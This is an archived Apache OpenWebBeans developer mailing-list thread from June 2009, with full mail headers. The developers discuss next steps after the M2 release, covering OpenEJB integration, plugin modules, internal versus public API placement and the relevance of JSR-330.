Date: Tue, 9 Jun 2009 11:58:10 +0300 Message-ID: <[email protected]> Subject: Re: Development Next Steps From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001636c5a3bce6d214046be68ef8 X-Virus-Checked: Checked by ClamAV on apache.org --001636c5a3bce6d214046be68ef8 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hi Mohammad. Awesome! Thanks; --Gurkan 2009/6/9 Mohammad Nour El-Din <[email protected]> > Hi... > > I know I have not been active the last period, but thanks God at > last I got a home internet connection and I can get back working on > OWB. I would be more interested in integrating OWB with OpenEJB. > > I need to re-read the specs and it going to take me till the end of > this week, I hope to more active this time :). > > > > On Tue, Jun 9, 2009 at 9:51 AM, Mark Struberg<[email protected]> wrote: > > > > Hi Gurkan! > > > > Should we still stick to our approach to split non javaSE parts into > plugins? I'd prefer it, but not sure if it is still possible. So since now > all 'heavy' parts are done, I could start working on getting the plugins > finished. > > > > Also: did you already remove all parts from the 'official' API which have > been dropped from the Spec like Observers? > > Do we like to drop the functionality internally too? :( > > If not (which I prefer), we should start a new 'owb-internal-api' module. > > > > LieGrue, > > strub > > > > --- Gurkan Erdogdu <[email protected]> schrieb am Mo, 8.6.2009: > > > >> Von: Gurkan Erdogdu <[email protected]> > >> Betreff: Development Next Steps > >> An: [email protected] > >> Datum: Montag, 8. Juni 2009, 18:53 > >> Hi guys; > >> > >> As you already know, we have succesfully published our M2 > >> version. Altough a spec changes a lot from the last draft > >> version, I think we are on the good track. > >> > >> In the mean time I have sent June board report. In > >> this report I stated one point, from report: > >> > >> > >> NOT : Actually, last draft specification imposes on an > >> implementations > >> that it must be tightly integrated with a Java EE > >> Container's internals > >> , such that integration with an EJB 3.1 Container, Servlet > >> Container, > >> Managed Beans etc. So, we have to work closely on the > >> respective Apache > >> teams to push the implementation. > >> > >> > >> WDYT about the next items ? How could we proceed? > >> > >> Currently, I have been changing OWB API's for obeying to > >> the current draft specification. Moreover, there are > >> mainly the following points that have to be implemented as > >> next > >> > >> 1* EJBs > >> 2* Resources > >> 3* Bean Provider SPI > >> 4* Java Servlet, Managed Bean integration > >> > >> I will try to integrate OpenEJB with OWB. But this will be > >> on a collapsed ear level (ejbs can be placed on the war > >> deployment, ejb3.1 stuff). To real integration with EJBs, we > >> have to work closely with OpenEJB teams. > >> > >> > >> Thanks; > >> > >> --Gurkan > >> > >> > >> > >> > > > > > > > > > > > > -- > ---- > Thanks > - Mohammad Nour > - LinkedIn: http://www.linkedin.com/in/mnour > ---- > "Life is like riding a bicycle. To keep your balance you must keep moving" > - Albert Einstein > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --001636c5a3bce6d214046be68ef8-- From [email protected] Tue Jun 09 09:30:55 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9171 invoked from network); 9 Jun 2009 09:30:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 09:30:55 -0000 Received: (qmail 6244 invoked by uid 500); 9 Jun 2009 09:31:06 -0000 Delivered-To: [email protected] Received: (qmail 6213 invoked by uid 500); 9 Jun 2009 09:31:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6194 invoked by uid 99); 9 Jun 2009 09:30:59 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 09:30:59 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27807.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 09 Jun 2009 09:30:47 +0000 Received: (qmail 97581 invoked by uid 60001); 9 Jun 2009 09:30:25 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1244539825; bh=ypeUWhqo6/FCBuLymgtSA09qEIkhOkc7Q/tPpQ3aeEQ=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=fXCjJU4nAvCuiibTIY4nE1SQ4f3Fqdd0VfxK2qBdpWbZYRNIcOEGhr1gjGFGEZxo8oXpATq0plDs1qdbkYS5bmM+fZ09fa4Q8veFIy47B7NATlb/afQ1siLRbpeYgDptE7aDSJK+sHtTw05CXxh96TxWayxo6yU4cwN/MGk/CR0= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=eUjg7uss0uqMjDk1FeDDFJiZeykcR/r2JEuxUI3txQbEDyZ1vk+YDFy6t7fCIzDpzqi/iv6B0U4O9G/0h6M3tr18FPnrZ6n5lKk327m9QYTNxLX8UhPJOBOkVvNff149mU+1uSJERoSiHjCUJzwUdFKPoCbYiMjRa+Wrd5Arcoo=; Message-ID: <[email protected]> X-YMail-OSG: qn4wkaIVM1njPNKszUJhXrjuesPqX_7W9XUugjEP_cv2fFLLCbFPvWkh Received: from [161.129.204.104] by web27807.mail.ukl.yahoo.com via HTTP; Tue, 09 Jun 2009 09:30:25 GMT X-Mailer: YahooMailClassic/5.4.12 YahooMailWebService/0.7.289.15 Date: Tue, 9 Jun 2009 09:30:25 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: Development Next Steps To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hmmm, I'm not really happy with having APIs in the impl if the are to be us= ed from outside. There are a few reasons: .) users cannot find out easily what APIs we intend to be used from outside= . So they will probably get their hands on everything - also highly interna= lish stuff.which may break functionality if used unwisely. .) I don't like it if users use internal stuff because we cannot change our= internal mechanisms easily without the risk of breaking customer projects.= =20 .) What I had in mind: users have dependencies with scope 'compile' only f= or the API parts, the webbeans-impl and plugins should only have scope 'run= time' (or provided if we run in a J2EE container which has OWB on board)! Does this make sense to you? I don't think the additional effort is so high= , because this is only about moving interface definitions from webbeans-api= to openwebbeans-api (or something). LieGrue, strub --- Gurkan Erdogdu <[email protected]> schrieb am Di, 9.6.2009: > Von: Gurkan Erdogdu <[email protected]> > Betreff: Re: Development Next Steps > An: [email protected] > Datum: Dienstag, 9. Juni 2009, 10:57 > >>>Should we still stick to > our approach to split non javaSE parts into > plugins? > Yes. But we have to change the *Resource* sections into the > Bean that I did > for JMS. In JMS I created a JMSBean that is responsible for > injecting the > JMS related artifacts. Currently JPA EntityManagers are > injected directly > without using any Beans. So we have to create Bean > definitions for injecting > for all resources. This will change the current JPA > integration. >=20 > >>>Also: did you already remove all parts from the > 'official' API which have > been dropped from the Spec like Observers? > I am changing=A0 APIs to reflect the last draft. But if > we need that some > functionality must be remain in our implementation, I will > place those APIs > into the our implementation module. For example, lots of > exceptions are > thrown from the spec like DefinitionException, etc. I will > place those into > the our implementation module. >=20 > >>>we should start a new 'owb-internal-api' > module. > I think this is not necessary. Because, placing those APIs > into the > implementation module. >=20 > We have to push the implementation and lets create a > community around it. >=20 > All helps are welcome :) >=20 > Thanks; >=20 > --Gurkan >=20 >=20 > 2009/6/9 Mark Struberg <[email protected]> >=20 > > > > Hi Gurkan! > > > > Should we still stick to our approach to split non > javaSE parts into > > plugins? I'd prefer it, but not sure if it is still > possible. So since now > > all 'heavy' parts are done, I could start working on > getting the plugins > > finished. > > > > Also: did you already remove all parts from the > 'official' API which have > > been dropped from the Spec like Observers? > > Do we like to drop the functionality internally too? > :( > > If not (which I prefer), we should start a new > 'owb-internal-api' module. > > > > LieGrue, > > strub > > > > --- Gurkan Erdogdu <[email protected]> > schrieb am Mo, 8.6.2009: > > > > > Von: Gurkan Erdogdu <[email protected]> > > > Betreff: Development Next Steps > > > An: [email protected] > > > Datum: Montag, 8. Juni 2009, 18:53 > > > Hi guys; > > > > > > As you already know, we have succesfully > published our M2 > > > version. Altough a spec changes a lot from the > last draft > > > version, I think we are on the good track. > > > > > > In the mean time I have sent June board > report.=A0 In > > > this report I stated one point, from report: > > > > > > > > > NOT : Actually, last draft specification imposes > on an > > > implementations > > > that it must be tightly integrated with a Java > EE > > > Container's internals > > > , such that integration with an EJB 3.1 > Container, Servlet > > > Container, > > > Managed Beans etc. So, we have to work closely on > the > > > respective Apache > > > teams to push the implementation. > > > > > > > > > WDYT about the next items ? How could we > proceed? > > > > > > Currently, I have been changing OWB API's for > obeying to > > > the current draft specification. Moreover,=A0 > there are > > > mainly the following points that have to be > implemented as > > > next > > > > > > 1* EJBs > > > 2* Resources > > > 3* Bean Provider SPI > > > 4* Java Servlet, Managed Bean integration > > > > > > I will try to integrate OpenEJB with OWB. But > this will be > > > on a collapsed ear level (ejbs can be placed on > the war > > > deployment, ejb3.1 stuff). To real integration > with EJBs, we > > > have to work closely with OpenEJB teams. > > > > > > > > > Thanks; > > > > > > --Gurkan > > > > > > > > > > > > > > > > > > > > >=20 >=20 > --=20 > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com > =0A=0A=0A From [email protected] Tue Jun 09 09:56:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22200 invoked from network); 9 Jun 2009 09:56:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 09:56:23 -0000 Received: (qmail 36097 invoked by uid 500); 9 Jun 2009 09:56:35 -0000 Delivered-To: [email protected] Received: (qmail 36079 invoked by uid 500); 9 Jun 2009 09:56:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36069 invoked by uid 99); 9 Jun 2009 09:56:35 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 09:56:35 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f219.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 09:56:24 +0000 Received: by bwz19 with SMTP id 19so3773641bwz.12 for <[email protected]>; Tue, 09 Jun 2009 02:56:02 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=BMXQk8MtCRU9RCkdefaW88CqmXVOxbKm1pzvN3Qmdh8=; b=i2SNFeWAwq5xvSpETNxXFy1UOYNPh4XfsVYzWaPLbHNCEjBDzfANIxgXdtzUAYn2sy V3mfbYq7S1bmBsfnmra+NRrNuxNr8bSNKalaAxks029GezUGQzpeJ27OUBQ5BDYJzGCK 1gFzQWqjWx3tI1H55m4N1smdtA7czLbNwwcmg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=hIhfuJbaHy5FfqcGm7kTZgv+/Bhb82BfIsRg8q/pBx3KgipZVdzrPvSjndIdqENvHv iizSl75rhSrVu2X6e3RnXKau/lroICZB3ik8ZwrKlNChNvjMh0wpn6u4qSeCtl+gQAyI V57eWuA6xCR/m+y20ys1F6WBglSnnUSEPeRww= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id s11mr4989542fao.4.1244541362553; Tue, 09 Jun 2009 02:56:02 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 9 Jun 2009 12:56:02 +0300 Message-ID: <[email protected]> Subject: Re: Development Next Steps From: Mohammad Nour El-Din <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Great :), but I really need to understand what is the effect of the new JSR of std Java Dependency Injection API(s) on us ? On Tue, Jun 9, 2009 at 10:23 AM, Mark Struberg<[email protected]> wrote: > > Hi and welcome back Mohammad :) > > You don't missed much, since the spec changed heavily and we also have to= reread it once again... > > LieGrue, > strub > > --- Mohammad Nour El-Din <[email protected]> schrieb am Di, 9.6.200= 9: > >> Von: Mohammad Nour El-Din <[email protected]> >> Betreff: Re: Development Next Steps >> An: [email protected] >> Datum: Dienstag, 9. Juni 2009, 9:16 >> Hi... >> >> =A0 I know I have not been active the last period, but >> thanks God at >> last I got a home internet connection and I can get back >> working on >> OWB. I would be more interested in integrating OWB with >> OpenEJB. >> >> I need to re-read the specs and it going to take me till >> the end of >> this week, I hope to more active this time :). >> >> >> >> On Tue, Jun 9, 2009 at 9:51 AM, Mark Struberg<[email protected]> >> wrote: >> > >> > Hi Gurkan! >> > >> > Should we still stick to our approach to split non >> javaSE parts into plugins? I'd prefer it, but not sure if it >> is still possible. So since now all 'heavy' parts are done, >> I could start working on getting the plugins finished. >> > >> > Also: did you already remove all parts from the >> 'official' API which have been dropped from the Spec like >> Observers? >> > Do we like to drop the functionality internally too? >> :( >> > If not (which I prefer), we should start a new >> 'owb-internal-api' module. >> > >> > LieGrue, >> > strub >> > >> > --- Gurkan Erdogdu <[email protected]> >> schrieb am Mo, 8.6.2009: >> > >> >> Von: Gurkan Erdogdu <[email protected]> >> >> Betreff: Development Next Steps >> >> An: [email protected] >> >> Datum: Montag, 8. Juni 2009, 18:53 >> >> Hi guys; >> >> >> >> As you already know, we have succesfully published >> our M2 >> >> version. Altough a spec changes a lot from the >> last draft >> >> version, I think we are on the good track. >> >> >> >> In the mean time I have sent June board report. >> In >> >> this report I stated one point, from report: >> >> >> >> >> >> NOT : Actually, last draft specification imposes >> on an >> >> implementations >> >> that it must be tightly integrated with a Java EE >> >> Container's internals >> >> , such that integration with an EJB 3.1 Container, >> Servlet >> >> Container, >> >> Managed Beans etc. So, we have to work closely on >> the >> >> respective Apache >> >> teams to push the implementation. >> >> >> >> >> >> WDYT about the next items ? How could we proceed? >> >> >> >> Currently, I have been changing OWB API's for >> obeying to >> >> the current draft specification. Moreover,=A0 there >> are >> >> mainly the following points that have to be >> implemented as >> >> next >> >> >> >> 1* EJBs >> >> 2* Resources >> >> 3* Bean Provider SPI >> >> 4* Java Servlet, Managed Bean integration >> >> >> >> I will try to integrate OpenEJB with OWB. But this >> will be >> >> on a collapsed ear level (ejbs can be placed on >> the war >> >> deployment, ejb3.1 stuff). To real integration >> with EJBs, we >> >> have to work closely with OpenEJB teams. >> >> >> >> >> >> Thanks; >> >> >> >> --Gurkan >> >> >> >> >> >> >> >> >> > >> > >> > >> > >> >> >> >> -- >> ---- >> Thanks >> - Mohammad Nour >> - LinkedIn: http://www.linkedin.com/in/mnour >> ---- >> "Life is like riding a bicycle. To keep your balance you >> must keep moving" >> - Albert Einstein >> > > > > --=20 ---- Thanks - Mohammad Nour - LinkedIn: http://www.linkedin.com/in/mnour ---- "Life is like riding a bicycle. To keep your balance you must keep moving" - Albert Einstein From [email protected] Tue Jun 09 09:57:41 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22557 invoked from network); 9 Jun 2009 09:57:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 09:57:39 -0000 Received: (qmail 38947 invoked by uid 500); 9 Jun 2009 09:57:51 -0000 Delivered-To: [email protected] Received: (qmail 38932 invoked by uid 500); 9 Jun 2009 09:57:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38922 invoked by uid 99); 9 Jun 2009 09:57:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 09:57:51 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f219.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 09:57:42 +0000 Received: by bwz19 with SMTP id 19so3774492bwz.12 for <[email protected]>; Tue, 09 Jun 2009 02:57:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=fgEnn2PAd5Weta3QlxNO6SJbe6l6iW88YF7eKRW9hag=; b=EEkmIlJexFbuAjaXBIP2094FKkpHso0wHYxgbe+06niOPZPiK6NZbZh8Lm5Y74SY7p 6edJjVX6/5QpzZ/oFZilxemCvdVHEbYPBI/S7mvd7dIAysNmSr8DUZlyci0xF8hj5vax 5nv9D+JOqUazrWkjnKOn/KqFNyNypZlmI77ow= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=QLgcR4BJClmdMXQH1W65COc4GHkoOzxPzkPIHGEmWdDOWGAic7b2uPXmPLFugLGUKv VrFDPdbz6/3qdtloZheKd53CyKpq++URoF1A18ZD3CU949+AD9bGyZh4L8ONj6qYOMHN IanlvcZwSFlJI3f+ghmQYdhiL8d9KMmjQQ2DE= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id b17mr7571408bkh.212.1244541440105; Tue, 09 Jun 2009 02:57:20 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 9 Jun 2009 12:57:20 +0300 Message-ID: <[email protected]> Subject: Re: Development Next Steps From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=00504502b630721c19046be762b6 X-Virus-Checked: Checked by ClamAV on apache.org --00504502b630721c19046be762b6 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Yeap agree with you. But, I am not sure how much functionality we will move into the impl. I think this will not so much. If lots of code has to be moved into the impl module, then we can create new owb-api module for separating API. For the time being, I am not thinking about creating new OWB API. But we may consider it into the account after carefully reading all the specification to find all of the removed/added/changed contracts. Thanks; --Gurkan 2009/6/9 Mark Struberg <[email protected]> > > Hmmm, I'm not really happy with having APIs in the impl if the are to be > used from outside. There are a few reasons: > > .) users cannot find out easily what APIs we intend to be used from > outside. So they will probably get their hands on everything - also highly > internalish stuff.which may break functionality if used unwisely. > > .) I don't like it if users use internal stuff because we cannot change our > internal mechanisms easily without the risk of breaking customer projects. > > .) What I had in mind: users have dependencies with scope 'compile' only > for the API parts, the webbeans-impl and plugins should only have scope > 'runtime' (or provided if we run in a J2EE container which has OWB on > board)! > > Does this make sense to you? I don't think the additional effort is so > high, because this is only about moving interface definitions from > webbeans-api to openwebbeans-api (or something). > > LieGrue, > strub > > --- Gurkan Erdogdu <[email protected]> schrieb am Di, 9.6.2009: > > > Von: Gurkan Erdogdu <[email protected]> > > Betreff: Re: Development Next Steps > > An: [email protected] > > Datum: Dienstag, 9. Juni 2009, 10:57 > > >>>Should we still stick to > > our approach to split non javaSE parts into > > plugins? > > Yes. But we have to change the *Resource* sections into the > > Bean that I did > > for JMS. In JMS I created a JMSBean that is responsible for > > injecting the > > JMS related artifacts. Currently JPA EntityManagers are > > injected directly > > without using any Beans. So we have to create Bean > > definitions for injecting > > for all resources. This will change the current JPA > > integration. > > > > >>>Also: did you already remove all parts from the > > 'official' API which have > > been dropped from the Spec like Observers? > > I am changing APIs to reflect the last draft. But if > > we need that some > > functionality must be remain in our implementation, I will > > place those APIs > > into the our implementation module. For example, lots of > > exceptions are > > thrown from the spec like DefinitionException, etc. I will > > place those into > > the our implementation module. > > > > >>>we should start a new 'owb-internal-api' > > module. > > I think this is not necessary. Because, placing those APIs > > into the > > implementation module. > > > > We have to push the implementation and lets create a > > community around it. > > > > All helps are welcome :) > > > > Thanks; > > > > --Gurkan > > > > > > 2009/6/9 Mark Struberg <[email protected]> > > > > > > > > Hi Gurkan! > > > > > > Should we still stick to our approach to split non > > javaSE parts into > > > plugins? I'd prefer it, but not sure if it is still > > possible. So since now > > > all 'heavy' parts are done, I could start working on > > getting the plugins > > > finished. > > > > > > Also: did you already remove all parts from the > > 'official' API which have > > > been dropped from the Spec like Observers? > > > Do we like to drop the functionality internally too? > > :( > > > If not (which I prefer), we should start a new > > 'owb-internal-api' module. > > > > > > LieGrue, > > > strub > > > > > > --- Gurkan Erdogdu <[email protected]> > > schrieb am Mo, 8.6.2009: > > > > > > > Von: Gurkan Erdogdu <[email protected]> > > > > Betreff: Development Next Steps > > > > An: [email protected] > > > > Datum: Montag, 8. Juni 2009, 18:53 > > > > Hi guys; > > > > > > > > As you already know, we have succesfully > > published our M2 > > > > version. Altough a spec changes a lot from the > > last draft > > > > version, I think we are on the good track. > > > > > > > > In the mean time I have sent June board > > report. In > > > > this report I stated one point, from report: > > > > > > > > > > > > NOT : Actually, last draft specification imposes > > on an > > > > implementations > > > > that it must be tightly integrated with a Java > > EE > > > > Container's internals > > > > , such that integration with an EJB 3.1 > > Container, Servlet > > > > Container, > > > > Managed Beans etc. So, we have to work closely on > > the > > > > respective Apache > > > > teams to push the implementation. > > > > > > > > > > > > WDYT about the next items ? How could we > > proceed? > > > > > > > > Currently, I have been changing OWB API's for > > obeying to > > > > the current draft specification. Moreover, > > there are > > > > mainly the following points that have to be > > implemented as > > > > next > > > > > > > > 1* EJBs > > > > 2* Resources > > > > 3* Bean Provider SPI > > > > 4* Java Servlet, Managed Bean integration > > > > > > > > I will try to integrate OpenEJB with OWB. But > > this will be > > > > on a collapsed ear level (ejbs can be placed on > > the war > > > > deployment, ejb3.1 stuff). To real integration > > with EJBs, we > > > > have to work closely with OpenEJB teams. > > > > > > > > > > > > Thanks; > > > > > > > > --Gurkan > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > -- > > Gurkan Erdogdu > > http://gurkanerdogdu.blogspot.com > > > > > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --00504502b630721c19046be762b6-- From [email protected] Tue Jun 09 10:02:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24940 invoked from network); 9 Jun 2009 10:02:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 10:02:22 -0000 Received: (qmail 42949 invoked by uid 500); 9 Jun 2009 10:02:34 -0000 Delivered-To: [email protected] Received: (qmail 42924 invoked by uid 500); 9 Jun 2009 10:02:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42914 invoked by uid 99); 9 Jun 2009 10:02:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 10:02:34 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f219.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 10:02:21 +0000 Received: by bwz19 with SMTP id 19so3777482bwz.12 for <[email protected]>; Tue, 09 Jun 2009 03:02:00 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=6PIC45igeanagn+KlMqLup5yUsm5xhO5Ra6JwbfwVIE=; b=ZqW1GlPwcfupTGLWUcwL6OFFygi20o38qH4lM7jW3FqwlVFhFmqUL2wmWYHFbGoJb8 anV/3zMvHYhWfxxw0KnyTQAQL+zR3tTpeQijYfzq8vXL0k1i12sN5d1Q/ufk7gxTE52F ezO0SWw9O4HtgrP0WHd49ZCyMqq+hpVWTkbko= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=bFZ9dIXAgdkIHTAYIRFBiU8SbKMbx0QTciiXIOT2MQ4cyBNRoxzUU5mtIUOzfaYzJw zPD7t5FBQtjSlH2HUrQb5b5kkOBcU2jy/E1aEZdbsl3jZViEGa7FpSbsnTBiDieatenW HIsdrcSI3apxXkl1CqdrW61bg2cmLw7HDRqhA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id a20mr7655750bkg.35.1244541719753; Tue, 09 Jun 2009 03:01:59 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Tue, 9 Jun 2009 13:01:59 +0300 Message-ID: <[email protected]> Subject: Re: Development Next Steps From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001636d34d541d3bdc046be77342 X-Virus-Checked: Checked by ClamAV on apache.org --001636d34d541d3bdc046be77342 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit >>Great :), but I really need to understand what is the effect of the >>new JSR of std Java Dependency Injection API(s) on us ? I think you consider about JSR 330. IMO, no effect, becuase it is created for using in the ava SE environment, otherwise JSR-299 is more specific to Java EE. Actually, this API maybe implemented on top of the OWB. We may be thinking of creating another extension that implements JSR-330 APIs using OWB :) Thanks; --Gurkan 2009/6/9 Mohammad Nour El-Din <[email protected]> > Great :), but I really need to understand what is the effect of the > new JSR of std Java Dependency Injection API(s) on us ? > > On Tue, Jun 9, 2009 at 10:23 AM, Mark Struberg<[email protected]> wrote: > > > > Hi and welcome back Mohammad :) > > > > You don't missed much, since the spec changed heavily and we also have to > reread it once again... > > > > LieGrue, > > strub > > > > --- Mohammad Nour El-Din <[email protected]> schrieb am Di, > 9.6.2009: > > > >> Von: Mohammad Nour El-Din <[email protected]> > >> Betreff: Re: Development Next Steps > >> An: [email protected] > >> Datum: Dienstag, 9. Juni 2009, 9:16 > >> Hi... > >> > >> I know I have not been active the last period, but > >> thanks God at > >> last I got a home internet connection and I can get back > >> working on > >> OWB. I would be more interested in integrating OWB with > >> OpenEJB. > >> > >> I need to re-read the specs and it going to take me till > >> the end of > >> this week, I hope to more active this time :). > >> > >> > >> > >> On Tue, Jun 9, 2009 at 9:51 AM, Mark Struberg<[email protected]> > >> wrote: > >> > > >> > Hi Gurkan! > >> > > >> > Should we still stick to our approach to split non > >> javaSE parts into plugins? I'd prefer it, but not sure if it > >> is still possible. So since now all 'heavy' parts are done, > >> I could start working on getting the plugins finished. > >> > > >> > Also: did you already remove all parts from the > >> 'official' API which have been dropped from the Spec like > >> Observers? > >> > Do we like to drop the functionality internally too? > >> :( > >> > If not (which I prefer), we should start a new > >> 'owb-internal-api' module. > >> > > >> > LieGrue, > >> > strub > >> > > >> > --- Gurkan Erdogdu <[email protected]> > >> schrieb am Mo, 8.6.2009: > >> > > >> >> Von: Gurkan Erdogdu <[email protected]> > >> >> Betreff: Development Next Steps > >> >> An: [email protected] > >> >> Datum: Montag, 8. Juni 2009, 18:53 > >> >> Hi guys; > >> >> > >> >> As you already know, we have succesfully published > >> our M2 > >> >> version. Altough a spec changes a lot from the > >> last draft > >> >> version, I think we are on the good track. > >> >> > >> >> In the mean time I have sent June board report. > >> In > >> >> this report I stated one point, from report: > >> >> > >> >> > >> >> NOT : Actually, last draft specification imposes > >> on an > >> >> implementations > >> >> that it must be tightly integrated with a Java EE > >> >> Container's internals > >> >> , such that integration with an EJB 3.1 Container, > >> Servlet > >> >> Container, > >> >> Managed Beans etc. So, we have to work closely on > >> the > >> >> respective Apache > >> >> teams to push the implementation. > >> >> > >> >> > >> >> WDYT about the next items ? How could we proceed? > >> >> > >> >> Currently, I have been changing OWB API's for > >> obeying to > >> >> the current draft specification. Moreover, there > >> are > >> >> mainly the following points that have to be > >> implemented as > >> >> next > >> >> > >> >> 1* EJBs > >> >> 2* Resources > >> >> 3* Bean Provider SPI > >> >> 4* Java Servlet, Managed Bean integration > >> >> > >> >> I will try to integrate OpenEJB with OWB. But this > >> will be > >> >> on a collapsed ear level (ejbs can be placed on > >> the war > >> >> deployment, ejb3.1 stuff). To real integration > >> with EJBs, we > >> >> have to work closely with OpenEJB teams. > >> >> > >> >> > >> >> Thanks; > >> >> > >> >> --Gurkan > >> >> > >> >> > >> >> > >> >> > >> > > >> > > >> > > >> > > >> > >> > >> > >> -- > >> ---- > >> Thanks > >> - Mohammad Nour > >> - LinkedIn: http://www.linkedin.com/in/mnour > >> ---- > >> "Life is like 